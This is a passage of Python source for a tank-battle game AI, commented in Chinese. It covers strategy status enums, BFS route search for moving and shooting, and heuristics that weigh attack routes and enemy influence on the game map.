墙后停止不前时,准备打通中线 TRY_TO_BREAK_ALWAYS_BACK_AWAY = 48 # 尝试打破一直回头的状态 FORCED_MARCHING = 49 # 强制行军,强攻,不考虑某些可能的风险 FORCED_WITHDRAW = 50 # 强制撤退,不考虑可能的风险 READY_TO_PREPARE_FOR_BREAK_BRICK = 51 # 准备为破墙而准备闪避路线 READY_TO_BREAK_BRICK = 52 # 准备破墙 READY_TO_BREAK_OVERLAP = 53 # 准备主动打破重叠 READY_TO_FORCED_MARCH = 54 # 准备主动强攻 FORCED_STOP_TO_PREVENT_TEAM_HURT = 55 # 防止团队间相互攻击而强制停止 READY_TO_BACK_AWAY_FROM_BRICK = 56 # 准备主动反向远离墙壁 HELP_TEAMMATE_ATTACK = 57 # 合作拆家,并且帮助队友进攻 ATTEMPT_TO_KILL_ENEMY = 58 # 主动防御时,尝试击杀敌军,这个状态可以用来记忆行为 BLOCK_ROAD_FOR_OUR_BASE = 59 # 主动防御时,遇到敌方面向基地,但没有炮弹,自己又恰好能阻挡在中间 SACRIFICE_FOR_OUR_BASE = 60 # 主动防御时,遇到敌方下一炮打掉基地,自己又恰好能阻挡 __Status_Name_Cache = None @staticmethod def get_name(status): """ 通过状态值自动判定方法 """ if __class__.__Status_Name_Cache is None: cache = __class__.__Status_Name_Cache = {} for k, v in __class__.__dict__.items(): if not k.startswith("_"): if isinstance(v, int): key = k.title() cache[v] = key cache = __class__.__Status_Name_Cache return cache.get(status, None) # 应该保证一定有方法? #{ END 'strategy/status.py' }# #{ BEGIN 'strategy/label.py' }# class Label(object, metaclass=UniqueIntEnumMeta): __offset__ = 300 NONE = 0 BREAK_OVERLAP_SIMULTANEOUSLY = 1 # 会和我同时打破重叠 SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP = 2 # 回合我方同时以射击的方式打破重叠 IMMEDIATELY_BREAK_OVERLAP_BY_MOVE = 3 # 当敌人和我方坦克重叠时,对方立即与我打破重叠 KEEP_ON_WITHDRAWING = 4 # 我方坦克持久化撤退状态 DONT_WITHDRAW = 5 # 强制性要求一个队员不再防御 ALWAYS_BACK_AWAY = 6 # 我方坦克总是尝试回头 __Status_Name_Cache = None @staticmethod def get_name(status): """ 通过状态值自动判定方法 """ if __class__.__Status_Name_Cache is None: cache = __class__.__Status_Name_Cache = {} for k, v in __class__.__dict__.items(): if not k.startswith("_"): if isinstance(v, int): key = k.title() cache[v] = key cache = __class__.__Status_Name_Cache return cache.get(status, None) # 应该保证一定有方法? #{ END 'strategy/label.py' }# #{ BEGIN 'strategy/utils.py' }# def fake_map_matrix_T_without_enemy(map, mySide): """ 伪造一个没有敌方坦克的地图类型矩阵 WARNING: 首先检查是不是对方 tank ,因为可能遇到对方已经死亡或者两方坦克重合 这种时候如果己方坦克恰好在这个位置,就会被删掉,assert 不通过 """ map_ = map oppSide = 1 - mySide cMatrixMap = map_.matrix_T.copy() for oppTank in map_.tanks[oppSide]: if (cMatrixMap[oppTank.xy] == Field.TANK + 1 + oppSide or cMatrixMap[oppTank.xy] == Field.MULTI_TANK # 还需要考虑重叠的坦克 ): cMatrixMap[oppTank.xy] = Field.EMPTY return cMatrixMap def fake_map_matrix_T_thinking_of_enemy_as_steel(map, mySide): """ 伪造一个敌方坦克视为钢墙的地图类型矩阵 用于在堵路时估计对方时候存在绕路的可能 """ map_ = map oppSide = 1 - mySide cMatrixMap = map_.matrix_T.copy() for oppTank in map_.tanks[oppSide]: if (cMatrixMap[oppTank.xy] == Field.TANK + 1 + oppSide or cMatrixMap[oppTank.xy] == Field.MULTI_TANK # 还需要考虑重叠的坦克 ): cMatrixMap[oppTank.xy] = Field.STEEL return cMatrixMap def get_manhattan_distance(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 曼哈顿距离 """ return np.abs(x1 - x2) + np.abs(y1 - y2) #{ END 'strategy/utils.py' }# #{ BEGIN 'strategy/route.py' }# INFINITY_WEIGHT = -1 # 无穷大的权重,相当于不允许到达 INFINITY_ROUTE_LENGTH = -1 # 无穷大的路径长度,相当于找不到路径 DUMMY_ACTION = -2 # 空行为 NONE_ACTION = -1 # 上回合什么都不做,相当于停止,专门用于 start == end 的情况 MOVE_ACTION = 0 # 上一回合操作标记为搜索 SHOOT_ACTION = 1 # 上一回合操作标记为射击 NONE_POINT = (-1, -1) # 没有相应的坐标 class RouteNode(object): """ 路径节点 ----------------- 搜索得到路径后,用于对路径的节点进行对象化的描述 Property: - x int 坐标 x - y int 坐标 y - xy (int, int) 坐标 (x, y) - weight int 节点权重,相当于走过这个节点需要多少步 - arrivalAction int 通过什么方式到达这个节点的 """ def __init__(self, x, y, weight=1, arrival_action=DUMMY_ACTION): self._x = x self._y = y self._weight = weight self._arrivalAction = arrival_action @property def x(self): return self._x @property def y(self): return self._y @property def xy(self): return (self._x, self._y) @property def weight(self): return self._weight @property def arrivalAction(self): return self._arrivalAction def from_shooting_area(self): return self._arrivalAction == SHOOT_ACTION def from_moving_area(self): return self._arrivalAction == MOVE_ACTION def __repr__(self): return str( (self._x, self._y, self._weight, self._arrivalAction) ) def __copy__(self): return self def __deepcopy__(self): return RouteNode(self._x, self._y, self._weight, self._arrivalAction) class Route(object): """ 路径类 ----------------- 用于对搜索得到的路径进行对象化的描述 Property: - nodes [RouteNode] 从 start -> end 的节点链 - length int 路径长度 - start (x, y) 起点坐标 - end (x, y) 终点坐标 Method: - is_not_found - has_block """ def __init__(self, node_chain=None): """ Input: ------------------------------------ - node_chain 节点链的 head ,对应着最后一步到达的节点 其中的节点是符合如下结构的 list def struct Node: [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,该情况为移动 ] """ self._nodeChain = self._get_dummy_head(node_chain) # 添加一个 dummy head 用于遍历 @staticmethod def _get_dummy_head(head=None): """ 添加在原始 node chain head 前的 dummy head ,方便遍历 """ return [ NONE_POINT, head, # 指向路径终点 end -1, -1, DUMMY_ACTION, ] @CachedProperty def nodes(self): nodes = [] currentNode = self._nodeChain while True: currentNode = currentNode[1] if currentNode is not None: x, y = currentNode[0] weight = currentNode[3] action = currentNode[4] nodes.append( RouteNode(x, y, weight, action) ) else: break nodes.reverse() return nodes def is_not_found(self): """ 是否是空路径,即没有找到可以到达终点的路径 """ return ( len(self.nodes) == 0 ) @CachedProperty def length(self): """ 获得路径长度,相当于节点权重的加和 如果没有找到路线,那么返回 INFINITY_ROUTE_LENGTH """ if self.is_not_found(): return INFINITY_ROUTE_LENGTH return np.sum( node.weight for node in self.nodes ) @property def start(self): """ 路径起点 如果没有找到路径,那么返回 NONE_POINT """ if self.is_not_found(): return NONE_POINT return self.nodes[0].xy @property def end(self): """ 路径终点 如果没有找到路径,那么返回 NONE_POINT """ if self.is_not_found(): return NONE_POINT return self.nodes[-1].xy def has_block(self, field): """ 判断一个 block 类型的 field (Brick/Base/Tank) 是否在该路径上 所谓的 block 类型指的是:必须要射击一次才能消灭掉 """ assert isinstance(field, (BrickField, BaseField, TankField) ), "%r is not a block field" % field for node in self.nodes: if node.xy == field.xy: if node.weight >= 2 and node.arrivalAction == MOVE_ACTION: # 移动受阻 return True elif node.weight >= 1 and node.arrivalAction == SHOOT_ACTION: # 射击受阻 return True return False def __len__(self): return self.length def __getitem__(self, idx): return self.nodes[idx] def __iter__(self): yield from self.nodes def __contains__(self, xy): assert isinstance(xy, tuple) and len(xy) == 2, "(x, y) is required" for node in self.nodes: if node.xy == xy: return True return False def __repr__(self): return "Route(%s)" % self.nodes def __copy__(self): return self def __deepcopy__(self): return Route(deepcopy(self._nodeChain)) #{ END 'strategy/route.py' }# #{ BEGIN 'strategy/search.py' }# # y-axis first / vertical first / aggressive DIRECTIONS_URDL = ( (0, -1), ( 1, 0), (0, 1), (-1, 0) ) # 上右下左 DIRECTIONS_ULDR = ( (0, -1), (-1, 0), (0, 1), ( 1, 0) ) # 上左下右 DIRECTIONS_DRUL = ( (0, 1), ( 1, 0), (0, -1), (-1, 0) ) # 下右上左 DIRECTIONS_DLUR = ( (0, 1), (-1, 0), (0, -1), ( 1, 0) ) # 下左上右 # x-axis first / horizontal first / defensive DIRECTIONS_RULD = ( ( 1, 0), (0, -1), (-1, 0), (0, 1) ) # 右上左下 DIRECTIONS_LURD = ( (-1, 0), (0, -1), ( 1, 0), (0, 1) ) # 左上右下 DIRECTIONS_RDLU = ( ( 1, 0), (0, 1), (-1, 0), (0, -1) ) # 右下左上 DIRECTIONS_LDRU = ( (-1, 0), (0, 1), ( 1, 0), (0, -1) ) # 左下右上 DEFAULT_BLOCK_TYPES = ( Field.STEEL, Field.WATER, ) DEFAULT_DESTROYABLE_TYPES = ( Field.BRICK, ) #------------------------ # 通常需要额外考虑的类型有 # # 1. 两方基地 # 2. 己方坦克和对方坦克 #------------------------ def get_searching_directions(x1, y1, x2=None, y2=None, x_axis_first=False, middle_first=False): """ 获得从 (x1, y1) -> (x2, y2) 最优的搜索方向顺序 Input: - (x1, y1) 起点坐标 - (x2, y2) 终点坐标,可以没有,那么将通过 (x1, y1) 在地图中的相对位置, 对应着左上、左下、右上、右下四个区域,确定最佳的搜索顺序 - x_axis_first bool 是否采用 x 轴方向优先的搜索方式。默认以垂直方向优先, 也就是如果存在到达目标坐标的两条长度相同的路径, 会优先从 y 轴方向移动过去,即先上下移动,后左右移动。 若选择以水平方向优先,则先左右移动,后上下移动。 优先上下移动通常用于侵略,优先左右移动通常用于防御 - middle_first bool 是否采用中路优先的搜索方式。默认不采用,而是优先从边路 搜索,如果边路和中路有距离相等的路径,那么优先从边路 走,如果中路发生冲突,就可以减小被敌人牵制的概率 注: x 轴优先仅仅在中路优先的成立下才有意义,如果是旁路搜索,则对 x 轴优先的 设置是无效的 """ if x2 is None or y2 is None: # 如果 x2, y2 为空,则默认以地图中点作为目标 x2 = MAP_WIDTH // 2 y2 = MAP_HEIGHT // 2 if ( x2 - x1 >= 0 ) and ( y2 - y1 >= 0 ): if middle_first: return DIRECTIONS_DRUL if not x_axis_first else DIRECTIONS_RDLU else: return DIRECTIONS_LDRU elif ( x2 - x1 >= 0 ) and ( y2 - y1 <= 0 ): if middle_first: return DIRECTIONS_URDL if not x_axis_first else DIRECTIONS_RULD else: return DIRECTIONS_LURD elif ( x2 - x1 <= 0 ) and ( y2 - y1 >= 0 ): if middle_first: return DIRECTIONS_DLUR if not x_axis_first else DIRECTIONS_LDRU else: return DIRECTIONS_RDLU elif ( x2 - x1 <= 0 ) and ( y2 - y1 <= 0 ): if middle_first: return DIRECTIONS_ULDR if not x_axis_first else DIRECTIONS_LURD else: return DIRECTIONS_RULD raise Exception def _BFS_search_all_routes_for_move(start, end, map_matrix_T, weight_matrix_T, block_types=DEFAULT_BLOCK_TYPES, x_axis_first=False, middle_first=False): """ BFS 搜索从 start -> end 的所有路径路径,由短到长依次返回 ---------------------------------------------------------------------------- Input: - start (int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 block_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - weight_matrix_T np.array( [[int]] ) 每个格子对应节点的权重,形状与坐标形式同上 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能够到达的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 ---------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,该情况为移动 ] """ x1, y1 = start x2, y2 = end width, height = map_matrix_T.shape # width, height 对应着转置前的 宽高 matrixMap = map_matrix_T matrixWeight = weight_matrix_T matrixCanMoveTo = np.ones_like(matrixMap, dtype=np.bool8) for _type in block_types: matrixCanMoveTo &= (matrixMap != _type) # debug_print("map:\n", matrixMap.T) # debug_print("weight:\n", matrixWeight.T) # debug_print("can move on:\n", matrixCanMoveTo.astype(np.int8).T) startNode = [ (x1, y1), None, 0, # 初始节点本来就已经到达了 0, # 初始节点不耗费步数 NONE_ACTION, ] queue = deque() # queue( [Node] ) matrixMarked = np.zeros_like(matrixMap, dtype=np.bool8) if DEBUG_MODE: matrixDistance = np.full_like(matrixMap, -1) queue.append(startNode) # init _foundRoute = False while len(queue) > 0: node = queue.popleft() if node[2] > 0: # 还剩 step 步 node[2] -= 1 queue.append(node) # 相当于下一个节点 continue x, y = node[0] if (x, y) == end: # 到达终点 _foundRoute = True yield Route(node) continue if matrixMarked[x, y]: continue matrixMarked[x, y] = True if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) for dx, dy in get_searching_directions(x1, x2, y1, y2, x_axis_first=x_axis_first, middle_first=middle_first): x, y = node[0] x3 = x + dx y3 = y + dy if (not (0 <= x3 < width and 0 <= y3 < height) # not in map or not matrixCanMoveTo[x3, y3] ): continue weight = matrixWeight[x3, y3] queue.append([ (x3, y3), node, weight-1, weight, MOVE_ACTION, ]) ''' if DEBUG_MODE: debug_print("distance matrix:\n", matrixDistance.T) ''' if not _foundRoute: yield Route() # 空节点 def _BFS_search_all_routes_for_shoot(start, end, map_matrix_T, move_weight_matrix_T, shoot_weight_matrix_T, block_types=DEFAULT_BLOCK_TYPES, destroyable_types=DEFAULT_DESTROYABLE_TYPES, x_axis_first=False, middle_first=False): """ BFS 搜索从 start 开始到击中 end 的所有路径,由短到长依次返回 ---------------------------------------------------------------------------- 实现思路: 通过射击的方式能够比单纯通过移动的方式更快地接近目标,这是显而易见的,毕竟炮弹可以飞行。 于是,将地图划分为两个区域,一个是可以发动射击的区域,它们仅仅与目标处在同一行或同一列的位置上 另一个就是常规的移动可达的区域。搜索过程中对着两种情况下相应的节点权重做区分对待即可。 --------------------------------------------------------------------------- Input: - start (int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 destroyable_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - move_weight_matrix_T np.array( [[int]] ) 移动到这个格子所需的步数 - shoot_weight_matrix_T np.array( [[int]] ) 炮弹到达这个格子所需的步数 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能被攻击的基地、坦克的类型 - destroyable_types [int] 能够通过射击行为摧毁的 field 类型,未指定在这个变量里的 所有其他 field 类型均默认视为不可摧毁,在以射击的方式进行 搜索时,遇到这样的 field 会跳过 WARNING: 需要自行制定可以被摧毁的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 -------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,射击或移动 ] """ x1, y1 = start x2, y2 = end width, height = map_matrix_T.shape matrixMap = map_matrix_T matrixMoveWeight = move_weight_matrix_T matrixShootWeight = shoot_weight_matrix_T # 哪些位置可以移动到 matrixCanMoveTo = np.ones_like(matrixMap, dtype=np.bool8) for _type in block_types: matrixCanMoveTo &= (matrixMap != _type) # 那些位置上的 field 可以被摧毁 matrixCanBeDestroyed = np.zeros_like(matrixMap, dtype=np.bool8) for _type in destroyable_types: matrixCanBeDestroyed |= (matrixMap == _type) # 哪些位置可以对目标发动射击,即 end 向四个方向伸展开的区域 matrixCanShoot = np.zeros_like(matrixMap, dtype=np.bool8) matrixCanShoot[x2, y2] = True for dx, dy in get_searching_directions(x1, y1, x2, y2, x_axis_first=x_axis_first, middle_first=middle_first): x, y = end while True: x += dx y += dy if not (0 <= x < width and 0 <= y < height): break elif matrixMap[x, y] == Field.EMPTY: # 空对象 pass elif matrixMap[x, y] == Field.WATER: continue # 水路不可以发动射击,但是可以射过去 elif not matrixCanBeDestroyed[x, y] and (x, y) != start: break # 打一个补丁,不管怎么样,攻击者原地是可以发动射击的 ... matrixCanShoot[x, y] = True if (x, y) == start: # 已经找到了 start 没有必要再继续找下去了 break # debug_print("map:\n", matrixMap.T) # debug_print("weight of move:\n", matrixMoveWeight.T) # debug_print("weight of shoot:\n", matrixShootWeight.T) # debug_print("can move to:\n", matrixCanMoveTo.astype(np.int8).T) # debug_print("can shoot:\n", matrixCanShoot.astype(np.int8).T) # debug_print("can be destroyed:\n", matrixCanBeDestroyed.astype(np.int8).T) startNode = [ (x1, y1), None, 0, # 初始节点本来就已经到达了 0, # 初始节点不耗费步数 NONE_ACTION, # 对于 start == end 的情况,将返回 startNode,相当于原地等待 ] queue = deque() # queue( [Node] ) matrixMarked = np.zeros_like(matrixMap, dtype=np.bool8) # 标记移动到的位置 if DEBUG_MODE: matrixDistance = np.full_like(matrixMap, -1) queue.append(startNode) # init _foundRoute = False while len(queue) > 0: # if start == (8, 1): # debug_print(start) # debug_print([n[0] for n in queue]) node = queue.popleft() if node[2] > 0: # 还剩 step 步 node[2] -= 1 queue.append(node) # 相当于下一个节点 continue x, y = node[0] if (x, y) == end: _foundRoute = True yield Route(node) continue # 1. 如果当前处在射击区域 # 2. 或者上回合射击(事实上射击行为必定是可延续的,也就是上回合 canShoot 这回合 # 必定应该继续 canShoot ,但是对于 WaterField 来说,不属于可以发动射击的区域 # 因此,如果上回合射进 WaterField 那么上一个判定条件就会失效。但在这种情况下 # 应该视为射击行为延续,因此需要第二个判定条件) # if matrixCanShoot[x, y] or node[4] == SHOOT_ACTION: # 因为在射击区域中,行为的方向都是单向的,不会出现从射击区域进入移动区域, # 或者从射击的下一步移动回到上一步的情况, # 因此没有必要对射击行为已到达过的节点位置进行检查和标记 if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) # 确定射击方向 dx = np.sign(x2 - x) dy = np.sign(y2 - y) x3 = x + dx y3 = y + dy weight = matrixShootWeight[x3, y3] nextNode = [ # 必定可以保证下一个节点仍然处在射击区域,不会到达地图外, (x3, y3), # 并且下次还会继续进入这个分支,除非已经到达基地 node, weight-1, # 补偿 weight, SHOOT_ACTION, # 标志着上一步处在射击区域内 ] if weight == 0: # 射击的过渡动作,下一个动作和当前动作同时发生 queue.appendleft(nextNode) # 添加到开头,下回合马上继续 else: queue.append(nextNode) else: # 否则为非射击区域,属于常规移动区域 if matrixMarked[x, y]: # 只对移动区域进行标记 continue matrixMarked[x, y] = True if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) for dx, dy in get_searching_directions(x1, y1, x2, y2, x_axis_first=x_axis_first, middle_first=middle_first): x3 = x + dx y3 = y + dy if (not (0 <= x3 < width and 0 <= y3 < height) # not in map or not matrixCanMoveTo[x3, y3] ): continue weight = matrixMoveWeight[x3, y3] if weight == INFINITY_WEIGHT: continue queue.append([ (x3, y3), node, weight-1, weight, MOVE_ACTION, # 标志着上一步处在非射击区域内 ]) if not _foundRoute: yield Route() # 空节点 @memorize def find_all_routes_for_move(start, end, matrix_T, block_types=DEFAULT_BLOCK_TYPES, x_axis_first=False, middle_first=False): """ 搜索移动到目标的所有路径 Input: - matrix_T np.array( [[int]] ) 游戏地图的类型矩阵的转置 Yield From: - route Route """ matrixMap = matrix_T matrixWeight = np.ones_like(matrixMap) matrixWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,移动一回合 matrixWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT matrixWeight[matrixMap == Field.WATER] = INFINITY_WEIGHT routes = _BFS_search_all_routes_for_move( start, end, matrixMap, matrixWeight, block_types=block_types, x_axis_first=x_axis_first, middle_first=middle_first) yield from routes @memorize def find_all_routes_for_shoot(start, end, matrix_T, block_types=DEFAULT_BLOCK_TYPES, destroyable_types=DEFAULT_DESTROYABLE_TYPES, x_axis_first=False, middle_first=False): """ 搜索移动并射击掉目标的所有路径 输入输出同上 """ matrixMap = matrix_T matrixMoveWeight = np.ones_like(matrixMap) # weight 默认为 1,即移动一回合 matrixMoveWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,移动一回合 matrixMoveWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT matrixMoveWeight[matrixMap == Field.WATER] = INFINITY_WEIGHT matrixShootWeight = np.zeros_like(matrixMap) # weight 默认为 0 ,即炮弹可以飞过 matrixShootWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,冷却一回合 matrixShootWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT for _type in BASE_FIELD_TYPES: matrixShootWeight[matrixMap == _type] = 1 # 射击一回合,之后就赢了 for _type in TANK_FIELD_TYPES: matrixShootWeight[matrixMap == _type] = 1 + 1 # 射击一回合,冷却一回合 # WARNING: # 这里只是从理论上分析 TANK, BASE 被打掉对应的权重,实际上我们不希望基地和队友 # 被打掉,因此在实际使用时,仅仅在 destroyable_types 中添加敌方的坦克即可 routes = _BFS_search_all_routes_for_shoot( start, end, matrixMap, matrixMoveWeight, matrixShootWeight, block_types=block_types, destroyable_types=destroyable_types, x_axis_first=x_axis_first, middle_first=middle_first) yield from routes def find_shortest_route_for_move(*args, **kwargs): """ 搜索移动到目标的最短路径 """ for route in find_all_routes_for_move(*args, **kwargs): return route # 直接返回第一个 route def find_shortest_route_for_shoot(*args, **kwargs): """ 搜索移动并射击掉目标的最短路径 """ for route in find_all_routes_for_shoot(*args, **kwargs): return route # 直接返回第一个 route def _get_route_length_by_node_chain(node): """ [DEBUG] 传入 node chain head ,计算其所代表的节点链对应的距离 Return: - length int 路线长度,如果是空路线,返回 无穷大长度 """ assert isinstance(node, list) and len(node) == 5 dummyHead = [ NONE_POINT, node, -1, -1, DUMMY_ACTION, ] route = [] node = dummyHead while True: node = node[1] if node is not None: x, y = node[0] weight = node[3] route.append( (x, y, weight) ) else: break if len(route) == 0: return INFINITY_ROUTE_LENGTH return np.sum( r[2] for r in route ) #{ END 'strategy/search.py' }# #{ BEGIN 'strategy/evaluate.py' }# def evaluate_aggressive(battler, oppBattler, strict=False, allow_withdraw=True): """ 根据敌我两架坦克的攻击线路长短,衡量当前侵略性 Input: - battler BattleTank - oppBattler BattleTank - strict bool 是否严格依据路线长度和两方基地位置进行评估 如果为 False ,则还会考虑其他的因素 - allow_withdraw bool 是否允许撤退 Return: [status] - Status.AGGRESSIVE 我方处于攻击状态 - Status.DEFENSIVE 我方处于防御状态 - Status.STALEMENT 双方处于僵持状态 - Status.WITHDRAW 我方处于撤退状态 """ map_ = battler._map BattleTank = type(battler) myRoute = battler.get_shortest_attacking_route() oppRoute = oppBattler.get_shortest_attacking_route() # 可能会遇到这种糟糕的情况,队友挡住了去路 5cdde41fd2337e01c79f1284 #-------------------------- if myRoute.is_not_found() or oppRoute.is_not_found(): return Status.AGGRESSIVE # 应该可以认为是侵略吧 # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" leadingLength = oppRoute.length - myRoute.length #debug_print(battler, oppBattler, "leading:", leadingLength) if battler.is_in_enemy_site(): # 在敌方半边地图,更倾向于不防御 if leadingLength >= 1: status = Status.AGGRESSIVE elif leadingLength < -3: status = Status.DEFENSIVE else: status = Status.STALEMENT else: # # 在我方半边地盘,会增加防御的可能性 # 差一步都要算作防御! # if leadingLength >= 1: status = Status.AGGRESSIVE # [1, +) elif -1 < leadingLength < 1: status = Status.STALEMENT # (-1, 1) -> 0 elif -2 <= leadingLength <= -1: status = Status.DEFENSIVE # [-2, -1] else: if allow_withdraw and battler.is_in_our_site(include_midline=True): # 包含中线,放松一点条件 status = Status.WITHDRAW # (-, -2) else: status = Status.DEFENSIVE # 否则不要撤退? if strict: # 严格模式直接返回评估状态 return status # # 撤退性状态直接返回 # if status == Status.WITHDRAW: return status # # 尽可能用攻击性策略! # # 还要判断对方的攻击路线是否可能会被我方队员阻拦 # 否则就过度防御了 5ce69a15d2337e01c7a90646 # if status != Status.AGGRESSIVE: map_ = battler._map tank = battler.tank teammate = None for _tank in map_.tanks[tank.side]: if _tank is not tank: teammate = _tank break if not teammate.destroyed: teammateBattler = BattleTank(teammate) for action in teammateBattler.get_all_valid_move_actions() + [ Action.STAY ]: with map_.simulate_one_action(teammateBattler, action): if teammateBattler.xy in oppRoute: # 此时视为侵略模式 return Status.AGGRESSIVE return status def estimate_route_similarity(route1, route2): """ 评估两条路线的相似度 一般用于判断选择某条路线是否可以和敌人相遇 实现思路: -------------- 首先找出两者中最短的一条路径,对于其上每一个点,在另一条路上寻找与之距离最短(曼哈顿距离即可) 的点,并将这两个点之间的距离作为总距离的一个部分,每个分距离和相应点的权重的加权平均值即为总距离 最后的估值为 总距离除以最短路线的坐标点数的均值 的倒数 值越接近 1 表示越相近,值越接近 0 表示越不相近 根据实际情景的需要,我们将较长路劲多出来的那些点忽略 ... TODO: ------------- 1. 如何考虑坐标权重 2. 如何考虑长路径中多出来的那些点 """ route1 = [ (node.x, node.y, node.weight) for node in route1 ] route2 = [ (node.x, node.y, node.weight) for node in route2 ] if len(route1) > len(route2): # 确保 route1 坐标数不超过 route2 route1, route2 = route2, route1 total = 0 for x1, y1, weight in route1: d = np.min([ get_manhattan_distance(x1, y1, x2, y2) for x2, y2, _ in route2 ]) total += d * weight return 1 / ( total / len(route1) + 1 ) def estimate_enemy_effect_on_route(route, player): """ 衡量敌人对我方所选的进攻路线的影响程度 ---------------------------------------- 敌人在进攻路线两侧,可能会阻碍进攻,也就是增加了相应路线进攻的回合数, 因此敌人的影响可以量化为相应路线长度的增加量。 将理论路线长度与敌人的影响所导致的长度增加量相加,所得的估值可以认为是 考虑了敌人影响后的真实路线长度,可以将这个真实路线长度对所选路线进行重新 排序,从而选出距离短,且受敌人影响最小的攻击路线 如何估计敌人影响? ------------------ 收集敌人当前所在位置所能影响到(近乎可认为是能射击到)的坐标。为了确保更加接近真实的情况, 再假设敌人当前回合能射击,模拟敌人所有可以执行的动作(包括移动和射击,考虑射击是因为有可能可以 摧毁一些土墙),之后同法收集敌人所能影响到的坐标。将这一坐标集所对应的区域视为受到敌人影响的区域。 随后统计当前路径与该坐标集的重叠程度(路径上的坐标出现在该坐标集内的,可视为重叠。这种路径节点的 数量越多,重叠程度越大),并认为这一重叠程度与敌人的影响程度正相关,也就是重叠的坐标点数与 路径长度的增长量正相关,从而实现量化估计。 特别的,如果敌人出现在攻击路线上,会造成较大的路线长度增加,有时甚至可以视为此路不通。 TODO: --------- 这种简单的静态分析策略可能存在对某些具体情况估计不到位的问题。当我方坦克沿着这条路线走到需要和 敌人正面交锋的位置时,有的时候可以通过闪避直接躲开,这种情况的影响可能比较小。而有的情况下是无法躲开的, 我方坦克只能选择往回闪避,这就相当于判定了这条路为死路 5cd24632a51e681f0e912613 (然而事实上情况还可以更加复杂,因为实际进攻的时候,有可能会采用一些特殊的策略,让这条路转化为活路, 例如预先打掉与我距离为 2 的墙)。 而在静态分析中,这些具体的差别可能无法区分,因此和更加真实合理的估计间可能存在着一定的差距。 但是采用动态分析可能不是一件很现实的事情,因为需要不断地模拟移动和模拟决策,一方面会造成算法过于 耗时,一方面也有可能会引入各种混乱(实现无差异地在多回合模拟移动和模拟决策间回滚,并且确保面向真实情况 决策的代码也能适用于模拟决策的情况,这将会是一个浩大的工程)。 Input: - route Route 待评估的路线 - player Tank2Player 将会采用这条路线的玩家对象 """ map_ = player._map # 通过玩家对象引入 map 全局对象 LENGTH_INCREMENT_OF_ENEMY_INFLUENCED = 1 # 受到敌人射击影响所导致的路线长度增量 LENGTH_INCREMENT_OF_ENEMY_BLOCKING = 10 # 敌人位于路线上所导致的路线长度增量 enemyInfluencedPoints = set() # 受敌人影响的坐标集 enemyBlockingPoints = set() # 敌人阻塞的坐标集 for oppBattler in [ oppPlayer.battler for oppPlayer in player.opponents ]: if oppBattler.destroyed: continue with map_.simulate_one_action(oppBattler, Action.STAY): # 刷新射击回合 for action in oppBattler.get_all_valid_actions(): # 包含了原地停止 with map_.simulate_one_action(oppBattler, action): with map_.simulate_one_action(oppBattler, Action.STAY): # 同理刷新冷却 enemyBlockingPoints.add( oppBattler.xy ) # blocking enemyInfluencedPoints.add( oppBattler.xy ) # 先加入敌人当前坐标 for dx, dy in get_searching_directions(*oppBattler.xy): x, y = oppBattler.xy while True: x += dx y += dy if not map_.in_map(x, y): break fields = map_[x, y] if len(fields) == 0: pass elif len(fields) > 1: # 两个以上敌人,不划入影响范围,并直接结束 break else: field = fields[0] if isinstance(field, EmptyField): pass elif isinstance(field, WaterField): continue # 水路可以认为不影响 #elif isinstance(field, (BaseField, BrickField, SteelField, TankField) ): else: break # block 类型,不划入影响范围,并直接结束 enemyInfluencedPoints.add( (x, y) ) # 以 pass 结尾的分支最后到达这里 realLength = route.length # 初始为路线长度 for node in route: xy = node.xy if xy in enemyInfluencedPoints: if node.weight > 0: # 射击的过渡点 weight == 0 它,它实际上不受敌人射击的影响 realLength += LENGTH_INCREMENT_OF_ENEMY_INFLUENCED if xy in enemyBlockingPoints: # 敌人阻塞,可以影响射击点,因此同等对待 realLength += LENGTH_INCREMENT_OF_ENEMY_BLOCKING return realLength def estimate_route_blocking(route): """ 评估路线上 block 类型块的数量 ---------------------------- 被用于撤退路线的评估 